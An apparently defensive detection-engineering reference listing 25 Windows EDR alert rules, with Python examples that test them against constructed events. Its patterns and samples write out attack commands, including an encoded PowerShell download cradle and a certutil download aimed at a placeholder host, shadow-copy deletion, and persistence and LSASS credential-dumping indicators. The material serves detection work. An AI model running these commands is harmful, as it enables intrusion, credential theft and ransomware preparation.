EDR Alert Rules

🛡️ Top 25 EDR Detection Rules

🔴 Process Execution & Parent-Child Chains

1. Suspicious Child Process from Office Applications

  • Trigger: winword.exe, excel.exe, outlook.exe spawning cmd.exe, powershell.exe, wscript.exe
  • Why: Macro-based malware execution
  • Fields: parent_process_name, child_process_name, command_line

2. PowerShell Spawned from Unusual Parents

  • Trigger: services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, mmc.exe spawning powershell.exe
  • Why: Lateral movement / remote code execution
  • Fields: parent_process_name, process_name, command_line

3. Suspicious Explorer.exe Child Process

  • Trigger: explorer.exe spawning cscript.exe, wscript.exe, powershell.exe, rundll32.exe, mshta.exe, regsvr32.exe
  • Why: DCOM abuse / Living-off-the-Land
  • Fields: parent_process, process_name, parent_args

4. Microsoft Exchange Worker Spawning Shell

  • Trigger: w3wp.exe with AppPool MSExchange* spawning cmd.exe, powershell.exe, pwsh.exe
  • Why: Web shell exploitation / ProxyShell/ProxyLogon
  • Fields: parent_process, process_name, process_args

5. Event Viewer Suspicious Child Process

  • Trigger: eventvwr.exe spawning cmd.exe, powershell.exe, mshta.exe
  • Why: UAC bypass / privilege escalation
  • Fields: parent_process_name, child_process_name, command_line

6. WMI Provider Spawning Command Shell

  • Trigger: wmiprvse.exe spawning cmd.exe, powershell.exe, rundll32.exe
  • Why: Fileless remote execution and lateral movement — wmiprvse.exe spawning PowerShell or CMD is a key artifact
  • Fields: parent_process, process_name, network_connection
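The six parent/child rules above share one shape: a parent name, a child name, and for rule 4 an extra condition on the parent's arguments. The following Python block is an added example, not code from the original page; it evaluates rules 1 to 6 over a few constructed process-creation events. The event record layout, the rule table, the rule ids, the sample paths and the assumption that IIS passes the AppPool name as -ap "<name>" are all choices made for this example.

```python
"""Worked example (not part of the rule list): evaluate parent/child rules
1-6 over constructed process-creation events.  Field names follow the
rule list; the event records, rule table and the w3wp.exe argument check
are assumptions made for this example."""
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class ProcessEvent:
    parent_process_name: str
    process_name: str
    command_line: str
    parent_args: str = ""  # rule 4 inspects the parent's "-ap <AppPool>" argument


# rule id -> (parent names, child names, optional glob over parent_args)
PARENT_CHILD_RULES = {
    "R1 Office app spawning shell": (
        ("winword.exe", "excel.exe", "outlook.exe"),
        ("cmd.exe", "powershell.exe", "wscript.exe"), None),
    "R2 PowerShell from unusual parent": (
        ("services.exe", "wmiprvse.exe", "svchost.exe", "wsmprovhost.exe", "mmc.exe"),
        ("powershell.exe",), None),
    "R3 Explorer spawning LOLBin": (
        ("explorer.exe",),
        ("cscript.exe", "wscript.exe", "powershell.exe", "rundll32.exe", "mshta.exe", "regsvr32.exe"), None),
    "R4 Exchange worker shell": (
        ("w3wp.exe",), ("cmd.exe", "powershell.exe", "pwsh.exe"),
        '*-ap "msexchange*'),  # assumption: IIS passes the AppPool name as -ap "<name>"
    "R5 Eventvwr child process": (
        ("eventvwr.exe",), ("cmd.exe", "powershell.exe", "mshta.exe"), None),
    "R6 WMI provider spawning shell": (
        ("wmiprvse.exe",), ("cmd.exe", "powershell.exe", "rundll32.exe"), None),
}


def _basename(image: str) -> str:
    """Telemetry usually carries full image paths; compare on the lower-cased basename."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list:
    """Return the ids of every rule the event matches; one event can hit several."""
    parent, child = _basename(event.parent_process_name), _basename(event.process_name)
    hits = []
    for rule_id, (parents, children, args_glob) in PARENT_CHILD_RULES.items():
        if parent in parents and child in children:
            if args_glob is None or fnmatchcase(event.parent_args.lower(), args_glob):
                hits.append(rule_id)
    return hits


# Constructed sample events (paths and AppPool names are illustrative)
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c ver"),
    ProcessEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c ver", parent_args='w3wp.exe -ap "MSExchangeOWAAppPool" -v "v4.0"'),
    ProcessEvent(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c ver", parent_args='w3wp.exe -ap "DefaultAppPool" -v "v4.0"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile"),
]


def run_samples() -> list:
    """Rule hits per sample event, in SAMPLE_EVENTS order."""
    return [evaluate(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{_basename(event.parent_process_name)} -> {_basename(event.process_name)}: {hits or 'no hit'}")
```

Two things the table alone does not show: the WmiPrvSE.exe -> powershell.exe event matches both rule 2 and rule 6, so an alert pipeline needs to deduplicate or rank overlapping hits, and the w3wp.exe event only fires when the parent's AppPool argument names an Exchange pool, which keeps ordinary IIS sites out of rule 4.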

🟠 Command Line & Script Execution

7. Encoded PowerShell Command (-enc / -e)

  • Trigger: powershell.exe with -e, -en, -enc, or -w hidden -e flags in command line
  • Why: Obfuscated payload delivery
  • Fields: process_name, command_line, parent_process_name

8. PowerShell Download Cradle

  • Trigger: powershell.exe command_line contains Invoke-WebRequest, IEX, DownloadString, WebClient
  • Why: Adversaries frequently abuse PowerShell’s ability to download and run code remotely — detection focuses on process starts and parent/child relationships enriched by command-line parameters
  • Fields: command_line, process_name, network_destination

9. Base64 Encoded PowerShell

  • Trigger: powershell.exe + command_line contains base64
  • Why: Base64 encoding isn’t inherently suspicious but is a key indicator — worth monitoring as it detects a wide variety of malicious activity
  • Fields: command_line, process_name, user

10. LOLBAS Abuse — Certutil for Download

  • Trigger: certutil.exe with -urlcache, -decode, -f flags
  • Why: Abusing trusted Windows binaries to download malware
  • Fields: process_name, command_line, network_connection

11. Scheduled Task Created via schtasks.exe

  • Trigger: schtasks.exe /create with /sc, /tr, /ru SYSTEM
  • Why: Adversaries including Ryuk ransomware and NOBELIUM leverage schtasks.exe for lateral movement, persistence, and execution
  • Fields: command_line, parent_process, user, task_name_entropy

12. Service Installation via sc.exe / services.exe

  • Trigger: sc.exe create or Event ID 7045 (new service installed)
  • Why: EDR must alert on new services installed outside maintenance windows — often linked to privilege escalation or lateral movement
  • Fields: command_line, service_name, binary_path, user
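Rules 7 to 12 all key on the command line. The point that is easy to miss is that rule 7 and rules 8/9 interact: an -enc payload is base64 of a UTF-16LE string, and once decoded it can be checked for the same download-cradle and base64 indicators as a plain command line. The following Python block is an added example, not code from the original page; the accepted flag spellings, the rule ids and the sample command lines (the inner script and example.invalid URL are constructed) are assumptions for this example.

```python
"""Worked example (not part of the rule list): command-line rules 7-12
evaluated over constructed command lines.  Decoding the -enc payload lets
rules 8 and 9 also see what an encoded command actually runs.  Flag
spellings, sample command lines and rule ids are assumptions for this example."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often (assumption: extend the list to taste).
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)
DOWNLOAD_CRADLE_TOKENS = ("invoke-webrequest", "iex", "downloadstring", "webclient")
CERTUTIL_FLAGS = ("-urlcache", "-decode", "-f")


def decode_encoded_command(command_line: str):
    """Return the decoded -enc script (UTF-16LE inside base64), or None if the flag is absent.
    A payload that is not valid base64/UTF-16LE is reported as "<undecodable>" so that a
    malformed blob still surfaces instead of being silently dropped."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_command_line(process_name: str, command_line: str) -> list:
    """Return the ids of rules 7-12 that the process/command-line pair matches."""
    exe = _basename(process_name)
    cl = command_line.lower()
    hits = []
    if exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(command_line)
        # Inspect the visible command line with the base64 blob removed (so random
        # base64 characters cannot spell "iex") plus the decoded script itself.
        visible = ENCODED_FLAG.sub(" ", cl)
        inspected = visible + " " + (decoded or "").lower()
        if decoded is not None:
            hits.append("R7 encoded PowerShell")
        if any(tok in inspected for tok in DOWNLOAD_CRADLE_TOKENS):
            hits.append("R8 download cradle")
        if "base64" in inspected:  # e.g. FromBase64String in the visible or decoded text
            hits.append("R9 base64 in PowerShell command")
    elif exe == "certutil.exe":
        if any(flag in cl.split() for flag in CERTUTIL_FLAGS):
            hits.append("R10 certutil download/decode")
    elif exe == "schtasks.exe":
        tokens = cl.replace('"', "").split()
        if "/create" in tokens and "/tr" in tokens and "/ru" in tokens:
            idx = tokens.index("/ru") + 1
            run_as = tokens[idx] if idx < len(tokens) else ""
            if run_as == "system" or "authority\\system" in cl:
                hits.append("R11 schtasks /create running as SYSTEM")
    elif exe == "sc.exe" and "create" in cl.split():
        hits.append("R12 service creation via sc.exe")
    return hits


# Constructed samples; the inner script and URL are illustrative (example.invalid is reserved)
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_ENCODED = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLES = [
    ("powershell.exe", f"powershell.exe -NoP -W Hidden -enc {SAMPLE_ENCODED}"),
    ("powershell.exe", "powershell.exe -Command Get-Process"),
    ("certutil.exe", "certutil.exe -urlcache -split -f http://example.invalid/x x.bin"),
    ("schtasks.exe", r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Temp\u.exe" /ru SYSTEM'),
    ("sc.exe", r"sc.exe create upd binPath= C:\Temp\s.exe start= auto"),
]


def run_samples() -> list:
    """Rule hits per sample, in SAMPLES order."""
    return [evaluate_command_line(p, c) for p, c in SAMPLES]


if __name__ == "__main__":
    for (proc, cl), hits in zip(SAMPLES, run_samples()):
        print(f"{proc}: {hits or 'no hit'}")
    print("decoded:", decode_encoded_command(SAMPLES[0][1]))
```

The encoded sample trips rule 7 on its own and rule 8 only because the decoded script is inspected; a rule that looks at the raw command line never sees DownloadString inside the blob. Stripping the blob before the substring checks matters for the opposite reason: a long base64 string will eventually contain "iex" by chance.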

🟡 Persistence & Registry

13. Registry Run Key Modification

  • Trigger: Write to HKLM\Software\Microsoft\Windows\CurrentVersion\Run or HKCU\...\Run
  • Why: Registry Run Keys are one of the most common persistence mechanisms — EDR should alert on all modifications to these keys
  • Fields: registry_key, registry_value, process_name, user

14. Startup Folder File Drop

  • Trigger: File created in C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • Why: Persistence without registry changes
  • Fields: file_path, parent_process, file_hash

15. WMI Event Subscription Creation

  • Trigger: WMI class __EventFilter, __EventConsumer, __FilterToConsumerBinding created
  • Why: Fileless persistence — survives reboots, no disk artifacts
  • Fields: wmi_namespace, query, consumer_command, process_name
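The three persistence rules above each hinge on matching a location precisely: the Run key under either hive (and under HKU\<SID> as many sensors record HKCU), the per-user Startup folder, and the WMI subscription classes. The following Python block is an added example, not code from the original page; the hive aliases, the SID form, the startup-folder glob, the inclusion of the CommandLineEventConsumer and ActiveScriptEventConsumer subclasses, and the sample events (the SID and file names are constructed) are assumptions for this example.

```python
"""Worked example (not part of the rule list): rules 13-15 over constructed
registry, file and WMI events.  Hive aliases, the SID form of HKCU, the
startup-folder glob and the consumer class names are assumptions for this example."""
import re
from fnmatch import fnmatchcase

# Sysmon writes HKLM/HKCU/HKU; other sensors spell the hives out. Normalise first.
HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu", "hkey_users": "hku"}

# Rule 13: a value written directly under ...\CurrentVersion\Run (HKLM, HKCU, or the
# per-user SID form under HKU, with or without Wow6432Node). RunOnceEx etc. do not match.
RUN_KEY = re.compile(
    r"^(?:hklm|hkcu|hku\\s-1-5-[\d-]+)\\software\\(?:wow6432node\\)?"
    r"microsoft\\windows\\currentversion\\run(?:\\[^\\]+)?$")

# Rule 14: any file landing in a per-user Startup folder
STARTUP_GLOB = r"c:\users\*\appdata\roaming\microsoft\windows\start menu\programs\startup\*"

# Rule 15: the subscription classes plus the consumer subclasses actually instantiated
WMI_SUBSCRIPTION_CLASSES = {
    "__eventfilter", "__eventconsumer", "__filtertoconsumerbinding",
    "commandlineeventconsumer", "activescripteventconsumer",
}


def normalize_registry_path(path: str) -> str:
    hive, _, rest = path.replace("/", "\\").lower().partition("\\")
    return HIVE_ALIASES.get(hive, hive) + "\\" + rest


def is_run_key_write(target_object: str) -> bool:
    return RUN_KEY.match(normalize_registry_path(target_object)) is not None


def is_startup_folder_drop(file_path: str) -> bool:
    return fnmatchcase(file_path.replace("/", "\\").lower(), STARTUP_GLOB)


def is_wmi_subscription(class_name: str) -> bool:
    return class_name.lower() in WMI_SUBSCRIPTION_CLASSES


def evaluate_persistence(event: dict) -> list:
    """Dispatch one normalised event (dict with a 'type' key) to rules 13-15."""
    hits = []
    if event["type"] == "registry_set" and is_run_key_write(event["registry_key"]):
        hits.append("R13 Run key modification")
    if event["type"] == "file_create" and is_startup_folder_drop(event["file_path"]):
        hits.append("R14 Startup folder drop")
    if event["type"] == "wmi_create" and is_wmi_subscription(event["wmi_class"]):
        hits.append("R15 WMI event subscription")
    return hits


# Constructed sample events; the SID and file names are illustrative
SAMPLE_EVENTS = [
    {"type": "registry_set", "registry_key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "registry_set", "registry_key": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Sync"},
    {"type": "registry_set", "registry_key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Helper"},
    {"type": "registry_set", "registry_key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"},
    {"type": "file_create", "file_path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk"},
    {"type": "file_create", "file_path": r"C:\Users\alice\Downloads\helper.lnk"},
    {"type": "wmi_create", "wmi_class": "CommandLineEventConsumer"},
    {"type": "wmi_create", "wmi_class": "Win32_Process"},
]


def run_samples() -> list:
    """Rule hits per sample event, in SAMPLE_EVENTS order."""
    return [evaluate_persistence(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{event['type']}: {hits or 'no hit'}")
```

The hive normalisation is the part worth keeping: a Run-key rule written only against HKCU\... misses every per-user write when the sensor records the key under HKU\<SID>, which is how Sysmon reports it.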

🔵 Credential Access

16. LSASS Memory Access (Mimikatz Pattern)

  • Trigger: Process (non-system) opens handle to lsass.exe with PROCESS_VM_READ
  • Why: Credential dumping — maps to MITRE T1003.001
  • Fields: target_process, source_process, access_rights, user

17. SAM/NTDS Database Access

  • Trigger: Access to C:\Windows\System32\config\SAM, NTDS.dit
  • Why: Offline credential harvesting
  • Fields: file_path, process_name, user, timestamp

18. Suspicious Token Manipulation / SeDebugPrivilege

  • Trigger: Process requesting SeDebugPrivilege, SeImpersonatePrivilege
  • Why: Indicators of privilege escalation — look for processes requesting uncommon privileges, especially low-privilege processes spawning elevated children
  • Fields: privilege_name, process_name, parent_process, integrity_level
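Rule 16 is usually implemented against process-access telemetry that reports the granted access mask as a hex value (Sysmon Event ID 10 is the common source), and the useful check is a bit test for PROCESS_VM_READ rather than a list of "known Mimikatz masks". The following Python block is an added example, not code from the original page, covering rules 16 and 17; the allowlist of legitimate LSASS readers, the decision to match rule 17 on file basename so that copied hives also hit, and the sample events are assumptions for this example.

```python
"""Worked example (not part of the rule list): rules 16 and 17 over constructed
process-access and file-access events in Sysmon Event 10 style (GrantedAccess as
a hex mask).  The allowlist and the sample paths are assumptions for this example."""
PROCESS_VM_READ = 0x0010  # the right a credential dumper needs to read LSASS memory

# Processes that legitimately open LSASS with read rights on a typical host.
# Environment-specific tuning list (assumption): keep it short and audited.
LSASS_READ_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Rule 17 matches on basename so that a copy of the hive or database under any path hits
CREDENTIAL_STORE_NAMES = {"sam", "ntds.dit"}


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def is_lsass_read(source_image: str, target_image: str, granted_access: str) -> bool:
    """Rule 16: a non-allowlisted process obtained a handle to lsass.exe that includes PROCESS_VM_READ."""
    if _basename(target_image) != "lsass.exe":
        return False
    mask = int(granted_access, 16)  # accepts "0x1010" as well as "1010"
    if not mask & PROCESS_VM_READ:
        return False  # e.g. 0x1400 (query-only rights) is routine noise from monitoring tools
    return _norm(source_image) not in LSASS_READ_ALLOWLIST


def is_credential_store_access(file_path: str) -> bool:
    """Rule 17: the live SAM hive or NTDS.dit, or a copy of either (e.g. read via a shadow copy path)."""
    return _basename(file_path) in CREDENTIAL_STORE_NAMES


# Constructed sample events (paths are illustrative)
SAMPLE_PROCESS_ACCESS = [
    (r"C:\Users\alice\AppData\Local\Temp\tool.exe", r"C:\Windows\System32\lsass.exe", "0x1010"),
    (r"C:\Windows\System32\csrss.exe", r"C:\Windows\System32\lsass.exe", "0x1FFFFF"),
    (r"C:\Program Files\Monitor\agent.exe", r"C:\Windows\System32\lsass.exe", "0x1400"),
    (r"C:\Users\alice\AppData\Local\Temp\tool.exe", r"C:\Windows\System32\svchost.exe", "0x1010"),
]
SAMPLE_FILE_ACCESS = [
    r"C:\Windows\System32\config\SAM",
    r"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit",
    r"C:\Windows\System32\config\SYSTEM",
]


def run_samples() -> dict:
    """Per-sample verdicts for both rules."""
    return {
        "lsass": [is_lsass_read(*e) for e in SAMPLE_PROCESS_ACCESS],
        "stores": [is_credential_store_access(p) for p in SAMPLE_FILE_ACCESS],
    }


if __name__ == "__main__":
    print(run_samples())
```

Two tuning notes: the allowlist should be keyed on the full image path, not the basename, because a dumper named csrss.exe in a user-writable directory must still alert; and reads of the SYSTEM hive next to SAM are not in rule 17 as written, although an offline SAM decode needs both, so many teams add it.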

🟢 Network & Lateral Movement

19. Suspicious Network Connection from Non-Browser Process

  • Trigger: powershell.exe, cmd.exe, mshta.exe, wscript.exe making outbound connections on ports 80/443/4444/8080
  • Why: C2 beaconing / data exfiltration
  • Fields: process_name, destination_ip, destination_port, protocol

20. SMB Lateral Movement — PsExec Pattern

  • Trigger: psexec.exe or PSEXESVC service creation + C$/ADMIN$ share access
  • Why: Adversaries abuse psexec.py (Impacket) using administrative shares and hardcoded parameters — a reliable detection signature
  • Fields: process_name, command_line, remote_host, share_name

21. RDP Brute Force / Unusual RDP Login

  • Trigger: Multiple failed Event ID 4625 + success 4624 Type 10 (RemoteInteractive) from single IP
  • Why: Brute force leading to unauthorized RDP access
  • Fields: source_ip, destination_host, logon_type, account_name, failure_count

22. WinRM / WSMan Suspicious Child Process

  • Trigger: WSMProvHost.exe as parent of cmd.exe, powershell.exe, rundll32.exe
  • Why: PowerShell Remoting abuse for lateral movement
  • Fields: parent_process, child_process, command_line, source_host
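Rule 21 differs from the others in this section because it is stateful: a single 4624 is benign, and the alert depends on how many 4625 events the same source IP produced shortly before it. The following Python block is an added example, not code from the original page; it keeps a sliding window of failures per source IP and raises when a type 10 success follows them. The threshold, window length, host names and addresses (documentation ranges) are assumptions for this example.

```python
"""Worked example (not part of the rule list): rule 21 as a stateful
correlation over constructed 4625/4624 events.  Threshold, window, host
names and addresses are assumptions for this example."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILURE_THRESHOLD = 5           # failed logons from one source before a success is suspicious
WINDOW = timedelta(minutes=10)  # failures older than this are forgotten
LOGON_TYPE_REMOTE_INTERACTIVE = 10


def correlate_rdp_brute_force(events: list) -> list:
    """Alert when a 4624 logon type 10 from a source IP follows >= FAILURE_THRESHOLD
    4625 events from the same IP inside WINDOW.  Failures are counted regardless of
    their logon type because with NLA enabled failed RDP attempts are logged as type 3."""
    recent_failures = defaultdict(deque)  # source_ip -> timestamps of 4625s inside the window
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ip, now = ev["source_ip"], ev["time"]
        window = recent_failures[ip]
        while window and now - window[0] > WINDOW:
            window.popleft()
        if ev["event_id"] == 4625:
            window.append(now)
        elif ev["event_id"] == 4624 and ev["logon_type"] == LOGON_TYPE_REMOTE_INTERACTIVE:
            if len(window) >= FAILURE_THRESHOLD:
                alerts.append({
                    "source_ip": ip,
                    "destination_host": ev["host"],
                    "account_name": ev["account_name"],
                    "logon_type": ev["logon_type"],
                    "failure_count": len(window),
                })
                window.clear()  # one alert per burst, not one per later success
    return alerts


# Constructed sample events: one spraying source that eventually succeeds, one normal user
T0 = datetime(2024, 1, 1, 9, 0, 0)


def _ev(minute, event_id, ip, account, logon_type, host="WS-FINANCE-01"):
    return {"time": T0 + timedelta(minutes=minute), "event_id": event_id, "source_ip": ip,
            "account_name": account, "logon_type": logon_type, "host": host}


SAMPLE_EVENTS = (
    [_ev(-30, 4625, "203.0.113.10", "admin", 3)]  # too old, must not be counted
    + [_ev(m, 4625, "203.0.113.10", name, 3)
       for m, name in enumerate(["admin", "administrator", "backup", "svc_sql", "helpdesk", "jsmith"])]
    + [_ev(6, 4624, "203.0.113.10", "jsmith", 10)]
    + [_ev(1, 4625, "198.51.100.7", "alice", 3), _ev(2, 4624, "198.51.100.7", "alice", 10)]
)


def run_samples() -> list:
    """Alerts produced for SAMPLE_EVENTS."""
    return correlate_rdp_brute_force(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

The failure that happened 30 minutes earlier is dropped by the window, so the alert reports six failures, not seven; alice's single typo followed by a successful logon produces nothing. In production the same loop runs per destination host as well as per source IP, since a spray that rotates targets looks like one failure per host.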

⚫ Defense Evasion

23. Rundll32 / Regsvr32 with Unusual Arguments

  • Trigger: rundll32.exe or regsvr32.exe loading from %TEMP%, %APPDATA%, network paths, or scrobj.dll
  • Why: Proxy execution to bypass application whitelisting
  • Fields: command_line, loaded_dll, network_connection, parent_process

24. Process Injection Indicators

  • Trigger: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread API calls across processes
  • Why: Code injection to hide in legitimate processes (T1055)
  • Fields: source_process, target_process, api_calls, memory_region

25. Volume Shadow Copy Deletion

  • Trigger: vssadmin.exe delete shadows, wmic shadowcopy delete, bcdedit /set recoveryenabled No
  • Why: Pre-ransomware step — disables recovery options
  • Fields: command_line, process_name, parent_process, user
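Rule 24 is another stateful rule: none of the three API calls is suspicious alone (debuggers and some installers use all of them), and the signal is the ordered sequence from one process into a different one. The following Python block is an added example, not code from the original page; it tracks the sequence per (source pid, target pid) pair, ignores same-process calls, tolerates repeated WriteProcessMemory calls and expires stale partial sequences. The event shape, the window and the sample pids and image names are assumptions for this example.

```python
"""Worked example (not part of the rule list): rule 24 as a per-process-pair
state machine over constructed cross-process API call events.  The event
shape, window and sample pids/images are assumptions for this example."""
INJECTION_SEQUENCE = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")
WINDOW_SECONDS = 60.0  # all three calls must land inside this window


def detect_process_injection(api_events: list) -> list:
    """Each event: {"time", "source_pid", "source_process", "target_pid", "target_process", "api"}.
    An alert is raised for a (source, target) pair once the three calls have been seen in
    order; repeated WriteProcessMemory calls are tolerated, same-pid calls are ignored."""
    progress = {}  # (source_pid, target_pid) -> [index of next expected call, time of first call]
    alerts = []
    for ev in sorted(api_events, key=lambda e: e["time"]):
        if ev["source_pid"] == ev["target_pid"]:
            continue  # a process allocating in itself is normal; cross-process is the signal
        key = (ev["source_pid"], ev["target_pid"])
        state = progress.setdefault(key, [0, None])
        if state[1] is not None and ev["time"] - state[1] > WINDOW_SECONDS:
            state[:] = [0, None]  # stale partial sequence, start over
        if ev["api"] != INJECTION_SEQUENCE[state[0]]:
            continue  # out of order, or a repeat of a step already consumed
        if state[0] == 0:
            state[1] = ev["time"]
        state[0] += 1
        if state[0] == len(INJECTION_SEQUENCE):
            alerts.append({
                "source_process": ev["source_process"],
                "target_process": ev["target_process"],
                "api_calls": list(INJECTION_SEQUENCE),
                "duration_s": ev["time"] - state[1],
            })
            state[:] = [0, None]
    return alerts


# Constructed sample call stream (pids and image names are illustrative)
def _call(t, spid, sname, tpid, tname, api):
    return {"time": float(t), "source_pid": spid, "source_process": sname,
            "target_pid": tpid, "target_process": tname, "api": api}


SAMPLE_CALLS = [
    # full cross-process sequence with a repeated write: must alert
    _call(0, 1001, "loader.exe", 2002, "explorer.exe", "VirtualAllocEx"),
    _call(1, 1001, "loader.exe", 2002, "explorer.exe", "WriteProcessMemory"),
    _call(2, 1001, "loader.exe", 2002, "explorer.exe", "WriteProcessMemory"),
    _call(3, 1001, "loader.exe", 2002, "explorer.exe", "CreateRemoteThread"),
    # incomplete sequence: no thread created
    _call(0, 3003, "debugger.exe", 4004, "app.exe", "VirtualAllocEx"),
    _call(1, 3003, "debugger.exe", 4004, "app.exe", "WriteProcessMemory"),
    # same process on both sides: ignored
    _call(0, 5005, "self.exe", 5005, "self.exe", "VirtualAllocEx"),
    _call(1, 5005, "self.exe", 5005, "self.exe", "WriteProcessMemory"),
    _call(2, 5005, "self.exe", 5005, "self.exe", "CreateRemoteThread"),
    # thread creation without the preceding steps: wrong order
    _call(0, 6006, "tool.exe", 7007, "svc.exe", "CreateRemoteThread"),
    # steps spread beyond the window: expired
    _call(100, 8008, "slow.exe", 9009, "x.exe", "VirtualAllocEx"),
    _call(200, 8008, "slow.exe", 9009, "x.exe", "WriteProcessMemory"),
    _call(210, 8008, "slow.exe", 9009, "x.exe", "CreateRemoteThread"),
]


def run_samples() -> list:
    """Alerts produced for SAMPLE_CALLS."""
    return detect_process_injection(SAMPLE_CALLS)


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

Only the loader.exe -> explorer.exe stream alerts. Sensors that hook the native layer report the same behaviour as NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx, and other thread-start primitives exist, so a production rule treats each step as a set of equivalent calls rather than a single name; the pair-keyed state machine stays the same.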

📊 Quick Reference Table

 #   Rule Name                    Key Fields                       MITRE Tactic
 1   Office App Spawning Shell    parent_process, child_process    Execution
 2   PS from Unusual Parent       parent_process, command_line     Lateral Movement
 3   Explorer DCOM Abuse          parent_args, process_name        Defense Evasion
 4   Exchange Worker Shell        parent_process, process_name     Initial Access
 5   Eventvwr Child Process       parent_process, child_process    Privilege Escalation
 6   WMI Shell Spawn              parent_process, network          Lateral Movement
 7   Encoded PowerShell           command_line (-enc)              Execution
 8   PS Download Cradle           command_line, destination        Execution
 9   Base64 PowerShell            command_line                     Defense Evasion
10   Certutil Download            command_line, network            Defense Evasion
11   schtasks Creation            command_line, task_name          Persistence
12   Service Installation         service_name, binary_path        Persistence
13   Run Key Modification         registry_key, process            Persistence
14   Startup Folder Drop          file_path, hash                  Persistence
15   WMI Event Subscription       wmi_class, consumer              Persistence
16   LSASS Access                 target_process, access_rights    Credential Access
17   SAM/NTDS Access              file_path, process               Credential Access
18   Token Manipulation           privilege_name, integrity        Privilege Escalation
19   Non-Browser Network          process, dest_ip, port           C2 / Exfiltration
20   PsExec SMB Pattern           command_line, share              Lateral Movement
21   RDP Brute Force              source_ip, logon_type            Initial Access
22   WinRM Child Process          parent_process, child            Lateral Movement
23   Rundll32 Abuse               command_line, dll_path           Defense Evasion
24   Process Injection            api_calls, target_process        Defense Evasion
25   Shadow Copy Deletion         command_line, vssadmin           Impact

These rules are the backbone of detection engineering.